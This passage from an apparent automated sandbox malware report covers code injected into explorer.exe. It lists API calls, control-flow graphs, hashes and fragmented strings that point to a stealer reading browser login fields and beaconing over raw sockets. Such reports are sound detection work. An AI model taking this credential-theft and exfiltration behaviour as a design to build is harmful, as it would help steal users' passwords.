8d5f7b2 148->156 153 8d63779-8d63784 149->153 154 8d63919-8d63920 149->154 152->144 159 8d63756 152->159 160 8d63786-8d63793 153->160 161 8d63795-8d63796 153->161 154->160 155->153 155->156 156->158 158->26 159->144 160->161 164 8d6379c-8d637a0 160->164 161->164 167 8d637a2-8d637af 164->167 168 8d637b1-8d637b2 164->168 167->168 170 8d637b8-8d637c4 167->170 168->170 173 8d637c6-8d637ef call 8d63d92 call 8d63d62 170->173 174 8d637f4-8d63861 setsockopt recv 170->174 173->174 177 8d638a3-8d638a4 174->177 178 8d63863 174->178 177->156 178->177 181 8d63865-8d6386a 178->181 181->177 184 8d6386c-8d63872 181->184 184->177 186 8d63874-8d638a1 184->186 186->177 186->178
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: getaddrinforecvsetsockopt
                                                                                • String ID: Co$&br=$&sql$&un=$: cl$GET $dat=$nnec$ose$tion
                                                                                • API String ID: 1564272048-1117930895
                                                                                • Opcode ID: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                • Instruction ID: 3b83bc0f829f12b14efdb6c396293d1bdda9ad67ae580c88500fc6156971bb0a
                                                                                • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                                                                • Instruction Fuzzy Hash: 3D529F30618A0C8BCB2DEF68D4847E9B7E1FB58351F50462EC49FC7246DE30A95ACB95
                                                                                Function 08D62232 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 642filenativeCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 321 8d62232-8d62256 322 8d6225c-8d62260 321->322 323 8d628bd-8d628cd 321->323 322->323 324 8d62266-8d622a0 322->324 325 8d622a2-8d622a6 324->325 326 8d622bf 324->326 325->326 328 8d622a8-8d622ac 325->328 327 8d622c6 326->327 329 8d622cb-8d622cf 327->329 330 8d622b4-8d622b8 328->330 331 8d622ae-8d622b2 328->331 332 8d622d1-8d622f7 call 8d62942 329->332 333 8d622f9-8d6230b 329->333 330->329 334 8d622ba-8d622bd 330->334 331->327 332->333 338 8d62378 332->338 333->338 339 8d6230d-8d62332 333->339 334->329 340 8d6237a-8d623a0 338->340 341 8d62334-8d6233b 339->341 342 8d623a1-8d623a8 339->342 345 8d62366-8d62370 341->345 346 8d6233d-8d62360 call 8d62942 341->346 343 8d623d5-8d623dc 342->343 344 8d623aa-8d623d3 call 8d62942 342->344 348 8d62410-8d62458 NtCreateFile call 8d62172 343->348 349 8d623de-8d6240a call 8d62942 343->349 344->338 344->343 345->338 351 8d62372-8d62373 345->351 346->345 357 8d6245d-8d6245f 348->357 349->338 349->348 351->338 357->338 358 8d62465-8d6246d 357->358 358->338 359 8d62473-8d62476 358->359 360 8d62486-8d6248d 359->360 361 8d62478-8d62481 359->361 362 8d624c2-8d624ec 360->362 363 8d6248f-8d624b8 call 8d62942 360->363 361->340 369 8d624f2-8d624f5 362->369 370 8d628ae-8d628b8 362->370 363->338 368 8d624be-8d624bf 363->368 368->362 371 8d62604-8d62611 369->371 372 8d624fb-8d624fe 369->372 370->338 371->340 373 8d62500-8d62507 372->373 374 8d6255e-8d62561 372->374 379 8d62538-8d62559 373->379 380 8d62509-8d62532 call 8d62942 373->380 376 8d62616-8d62619 374->376 377 8d62567-8d62572 374->377 385 8d6261f-8d62626 376->385 386 8d626b8-8d626bb 376->386 382 8d62574-8d6259d call 8d62942 377->382 383 8d625a3-8d625a6 377->383 381 8d625e9-8d625fa 379->381 380->338 380->379 381->371 382->338 382->383 383->338 390 8d625ac-8d625b6 383->390 387 8d62657-8d6266b call 8d63e92 385->387 388 8d62628-8d62651 call 8d62942 385->388 391 8d626bd-8d626c4 386->391 392 8d62739-8d6273c 386->392 387->338 409 8d62671-8d626b3 387->409 388->338 388->387 390->338 399 8d625bc-8d625e6 390->399 400 8d626c6-8d626ef call 8d62942 391->400 401 8d626f5-8d62734 391->401 396 8d627c4-8d627c7 392->396 397 8d62742-8d62749 392->397 396->338 406 8d627cd-8d627d4 396->406 404 8d6277a-8d627bf 397->404 405 8d6274b-8d62774 call 8d62942 397->405 399->381 400->370 400->401 416 8d62894-8d628a9 401->416 404->416 405->370 405->404 411 8d627d6-8d627f6 call 8d62942 406->411 412 8d627fc-8d62803 406->412 409->340 411->412 414 8d62805-8d62825 call 8d62942 412->414 415 8d6282b-8d62835 412->415 414->415 415->370 421 8d62837-8d6283e 415->421 416->340 421->370 425 8d62840-8d62886 421->425 425->416
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateFile
                                                                                • String ID: `
                                                                                • API String ID: 823142352-2679148245
                                                                                • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                • Instruction ID: ffd15826fce258dd81dd64b7a2edcab8fadc215a0edfb94756cc9ff2afba34aa
                                                                                • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                                                                • Instruction Fuzzy Hash: DF223A70A18A0D9FCB59DF28C4956AEB7E1FB98352F40472ED45ED3250DB30E462CB85
                                                                                Function 08D63E12 Relevance: 1.6, APIs: 1, Instructions: 59nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL ref: 08D63E67
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                • Instruction ID: 9f07483a9646219df28ffc5f90f236c3a667bd079a7d7a78f7aae1647e3ba9c7
                                                                                • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                                                                • Instruction Fuzzy Hash: E001B134668B488F8B88EF6CE48012AB7E4FBDD355F000B3EE99AC3250EB70C5418752
                                                                                Function 08D63E0A Relevance: 1.6, APIs: 1, Instructions: 52nativeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • NtProtectVirtualMemory.NTDLL ref: 08D63E67
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: MemoryProtectVirtual
                                                                                • String ID:
                                                                                • API String ID: 2706961497-0
                                                                                • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                • Instruction ID: b350148c031cbd0965ec7c8f5856c9a5e3654ec88d0a0d3d9cafca7c162d2d1a
                                                                                • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                                                                • Instruction Fuzzy Hash: 7A01A234668B884B8B48EB2C94412A6B3E5FBCE315F000B3EE9DAC3251DB31D5028782
                                                                                Function 08D5D8C2 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 100COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ObtainUserAgentString.URLMON ref: 08D5D9A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: AgentObtainStringUser
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 2681117516-319646191
                                                                                • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction ID: 1e3bba0217b483a3866e562c2d176b1dd8e07d2d5bb2c9a7db6c12d520839542
                                                                                • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                • Instruction Fuzzy Hash: F031D131614A1C8BCF04EFA8D8847EDB7E1FB58256F40422AD45ED7340DF748A55CBA9
                                                                                Function 08D5D8BE Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 94COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • ObtainUserAgentString.URLMON ref: 08D5D9A0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: AgentObtainStringUser
                                                                                • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                • API String ID: 2681117516-319646191
                                                                                • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction ID: da0767e556ff2bea59911e166a9e37c0c770c8cfafa6e28e4d0da25f255a2749
                                                                                • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                • Instruction Fuzzy Hash: 9721C130A14A1C8BCF05EFA8D8847EDBBA1FF59256F40432ED45AD7340DF748A158BA9
                                                                                Function 08D59B66 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148synchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 232 8d59b66-8d59b68 233 8d59b93-8d59bb8 232->233 234 8d59b6a-8d59b71 232->234 236 8d59bbb-8d59c22 call 8d60612 call 8d62942 * 2 233->236 234->236 237 8d59b73-8d59b92 234->237 244 8d59cdc 236->244 245 8d59c28-8d59c2b 236->245 237->233 246 8d59cde-8d59cf6 244->246 245->244 247 8d59c31-8d59cd3 call 8d64da4 call 8d64022 call 8d643e2 call 8d64022 call 8d643e2 CreateMutexW 245->247 247->244 261 8d59cd5-8d59cda 247->261 261->246
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMutex
                                                                                • String ID: .dll$el32$kern
                                                                                • API String ID: 1964310414-1222553051
                                                                                • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                • Instruction ID: da29b2a5afd748de22797bcec2dc21327c5cd1311c75b169ea087bed4a7471c3
                                                                                • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                                                                • Instruction Fuzzy Hash: 21415A74918A0CCFDF54EFA8D8947AD7BE1FBA8301F00426AC84ADB255DA309945CB95
                                                                                Function 08D59B72 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 138synchronizationCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateMutex
                                                                                • String ID: .dll$el32$kern
                                                                                • API String ID: 1964310414-1222553051
                                                                                • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                • Instruction ID: ca809ffb548020287e306d912f6913435a3577ba0e620c225765652bbb3dc8db
                                                                                • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                                                                • Instruction Fuzzy Hash: C3415974918A0CCFDF84EFA8D498BED77E1FBA8301F04426AC84ADB255DE309945CB95
                                                                                Function 08D5F7AD Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 38COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 289 8d5f7ad-8d5f7af 290 8d5f7b2-8d5f7e2 289->290 291 8d5f7a9-8d5f7ac 289->291 292 8d5f804-8d5f817 closesocket 290->292 293 8d5f7e4-8d5f7fe call 8d62942 290->293 291->289 293->292
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: closesocket
                                                                                • String ID: clos$esoc$ket
                                                                                • API String ID: 2781271927-3604069445
                                                                                • Opcode ID: ee1b70bfe413abe81f2a603d8ad3f3acd70c209794b79f5e1d4ca8ff919d78d6
                                                                                • Instruction ID: 3790969cf1c1016c8e98c1a8ddb36723873718129e1bab3e435e4456ba4aa33b
                                                                                • Opcode Fuzzy Hash: ee1b70bfe413abe81f2a603d8ad3f3acd70c209794b79f5e1d4ca8ff919d78d6
                                                                                • Instruction Fuzzy Hash: 3CF08C74118B488BCB80EF18D48476ABBE0FB89355F54466DE88ECB255C77185528743
                                                                                Function 08D5F7B2 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 296 8d5f7b2-8d5f7e2 297 8d5f804-8d5f817 closesocket 296->297 298 8d5f7e4-8d5f7fe call 8d62942 296->298 298->297
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: closesocket
                                                                                • String ID: clos$esoc$ket
                                                                                • API String ID: 2781271927-3604069445
                                                                                • Opcode ID: 24c39bc4845c5401fa2dca815a246fa826a042ab8a355e13ed83dec9282e93cd
                                                                                • Instruction ID: 1cf25f4be4fbf72502275ba0fa99d3c613c880c41a6b2026204922cd7520fbfa
                                                                                • Opcode Fuzzy Hash: 24c39bc4845c5401fa2dca815a246fa826a042ab8a355e13ed83dec9282e93cd
                                                                                • Instruction Fuzzy Hash: 76F0307051CB089FCB84DF18D084B6AB7E0FB89355F54466DF44ECB244C77585428703
                                                                                Function 08D5F72E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 301 8d5f72e-8d5f768 302 8d5f788-8d5f7ab connect 301->302 303 8d5f76a-8d5f782 call 8d62942 301->303 303->302
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944
                                                                                • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                • Instruction ID: db91b7fbee559b5ecd8108dd90cf0b87d449262108379e84e1aff4ad47f42348
                                                                                • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                                                                • Instruction Fuzzy Hash: 8D015E30618B1C8FCB84EF1CE088B55B7E0FB58325F1546AED90DCB226CA74C8818BC2
                                                                                Function 08D5F732 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 306 8d5f732-8d5f768 307 8d5f788-8d5f7ab connect 306->307 308 8d5f76a-8d5f782 call 8d62942 306->308 308->307
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: connect
                                                                                • String ID: conn$ect
                                                                                • API String ID: 1959786783-716201944
                                                                                • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                • Instruction ID: f84c949b87c9df87aab3a42c834a8a081fb15b28bd95aac7c1aa1f49d6b69796
                                                                                • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                                                                • Instruction Fuzzy Hash: 8A012170618A1C8FCB84EF5CE048B5577E0FB59315F1545AE980DCB226CA74C9818BC2
                                                                                Function 08D5F62C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 311 8d5f62c-8d5f66b 312 8d5f66d-8d5f685 call 8d62942 311->312 313 8d5f68b-8d5f6a6 WSAStartup 311->313 312->313
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID: WSAS$tart
                                                                                • API String ID: 724789610-2426239465
                                                                                • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                                                                • Instruction ID: 802ba816fed81beaa714d39d9de1bc2641c65c6b06c10decfc593b74dda9efc9
                                                                                • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                                                                • Instruction Fuzzy Hash: AE018B30518A188FCB44DF1CD048B69BBE0FB58352F2502AED409CF276C7B0C9428B96
                                                                                Function 08D5F632 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 316 8d5f632-8d5f66b 317 8d5f66d-8d5f685 call 8d62942 316->317 318 8d5f68b-8d5f6a6 WSAStartup 316->318 317->318
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Startup
                                                                                • String ID: WSAS$tart
                                                                                • API String ID: 724789610-2426239465
                                                                                • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                                                                • Instruction ID: 2f989659a08f3c68ccefeada08ebd9a3026e3c439fafab440f427c398884ed37
                                                                                • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                                                                • Instruction Fuzzy Hash: 82014B70518A188FCB44DF1C9048B69BBE0FB58351F2542AAE40DCF276C7B0C9428B96
                                                                                Function 08D5F6B2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 53networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 429 8d5f6b2-8d5f6e5 430 8d5f705-8d5f72d send 429->430 431 8d5f6e7-8d5f6ff call 8d62942 429->431 431->430
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: send
                                                                                • String ID: send
                                                                                • API String ID: 2809346765-2809346765
                                                                                • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                • Instruction ID: 3cadc6cb83f4172f5b94e2fc8f8ae72bfa31b0789fc1a2c43e89d28bbb2f34f7
                                                                                • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                                                                • Instruction Fuzzy Hash: AC011270558A1C8FDB84EF1CE048B2577E0EB58315F1546AED85DCB266CA70D8818B81
                                                                                Function 08D5F5B2 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49networkCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 434 8d5f5b2-8d5f5ea 435 8d5f5ec-8d5f604 call 8d62942 434->435 436 8d5f60a-8d5f62b socket 434->436 435->436
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: socket
                                                                                • String ID: sock
                                                                                • API String ID: 98920635-2415254727
                                                                                • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                • Instruction ID: 994f970bd8af4bdd49363840fd170a60c347052207c68ec39675ac5277cde0f2
                                                                                • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                                                                • Instruction Fuzzy Hash: CA01217061861C8FCB84EF1CE048B54BBE0FB59355F1545AED85ECB276C7B0C9818B86
                                                                                Function 08D572DD Relevance: 1.6, APIs: 1, Instructions: 91COMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 439 8d572dd-8d57320 call 8d62942 442 8d57326 439->442 443 8d573fa-8d5740e 439->443 444 8d57328-8d57339 SleepEx 442->444 444->444 445 8d5733b-8d57341 444->445 446 8d57343-8d57349 445->446 447 8d5734b-8d57352 445->447 446->447 448 8d5735c-8d5736a call 8d61f12 446->448 449 8d57354-8d5735a 447->449 450 8d57370-8d57376 447->450 448->450 449->448 449->450 452 8d573b7-8d573bd 450->452 453 8d57378-8d5737e 450->453 455 8d573d4-8d573db 452->455 456 8d573bf-8d573cf call 8d57e72 452->456 453->452 454 8d57380-8d5738a 453->454 454->452 458 8d5738c-8d573b1 call 8d58432 454->458 455->444 460 8d573e1-8d573f5 call 8d570f2 455->460 456->455 458->452 460->444
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID:
                                                                                • API String ID: 3472027048-0
                                                                                • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                • Instruction ID: afd69089be61e299c4e6b0b4fcf23a4cb219322f3060b56e4f52be948f78f5c3
                                                                                • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                                                                • Instruction Fuzzy Hash: 42316C74604B09DFEF64AF2990482A9B7A1FB54352F64837FCD2DCA206CB349150CFA1
                                                                                Function 08D57412 Relevance: 1.5, APIs: 1, Instructions: 46threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924719873.0000000008C70000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C70000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8c70000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                • Instruction ID: bdd74e1470bbc900cc82972fff556416b7d8505565627cadfee50df25ce13590
                                                                                • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                                                                • Instruction Fuzzy Hash: C1F0C234668A4C4FDB88EB2CD44562AB3D0FBE8215F45063EA98DC3364DA39C5824716

                                                                                Non-executed Functions

                                                                                Function 081E5D02 Relevance: 14.2, Strings: 11, Instructions: 404COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                                                                • API String ID: 0-393284711
                                                                                • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                • Instruction ID: c9690d341a0a802848fa19d273992e3600a6230919da7adbb1f3c0a5c18cda3a
                                                                                • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                                                                • Instruction Fuzzy Hash: 82E148B4618F488FC7A5EF68C4847AAB7E0FF58302F504A2EA59BC7255DF30A541CB85
                                                                                Function 081E8792 Relevance: 21.6, Strings: 17, Instructions: 321COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                                                                • API String ID: 0-2916316912
                                                                                • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                • Instruction ID: 889c6205b98da8fe3d33471b628b065c1657e9822cd26201b8d1b185143130d6
                                                                                • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                                                                • Instruction Fuzzy Hash: 4AB18A70518B488EDB59EF68C485AEEB7F1FF98301F50492ED49AC7252EF709409CB86
                                                                                Function 081E6622 Relevance: 21.4, Strings: 17, Instructions: 151COMMON
                                                                                Download Yara Rule
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000D.00000002.924612433.0000000008160000.00000040.00000001.00040000.00000000.sdmp, Offset: 08160000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_13_2_8160000_explorer.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                                                                • API String ID: 0-1539916866
                                                                                • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                                                                • Instruction ID: 92584d34906cc0948b1ebe71d5aa08eb7b6213073ef05cf65796250049eb2b8b
                                                                                • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
